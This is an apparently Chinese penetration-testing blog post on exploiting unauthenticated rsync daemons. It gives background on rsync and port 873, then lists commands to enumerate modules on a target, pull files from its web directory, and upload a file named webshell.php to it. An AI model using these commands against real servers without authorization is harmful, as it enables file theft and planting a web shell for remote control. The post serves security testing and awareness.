Rsync未授权访问漏洞利用


1.关于Rsync

Rsync是linux系统下的数据镜像备份工具。使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他SSH、rsync主机同步。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现 相关漏洞的根源。

Rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync –daemon,启动成功后默认监听于TCP端口873,可通过rsync-daemon及ssh两种方式进行认证。



2.常用命令

查看目标IP存在哪些同步目录:

rsync 192.168.1.10::
rsync 192.168.1.10::web/
下载文件或目录到本地:


rsync -avz 192.168.1.10::web/1.php /root
rsync -avz 10.0.0.12::web/ /var/tmp
上传文件到服务器


rsync -avz webshell.php 192.168.1.10::web/


本博客所有文章如无特别注明均为原创。作者:R3m1x ,复制或转载请注明转自原文地址《Rsync未授权访问漏洞利用
分享到:更多

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)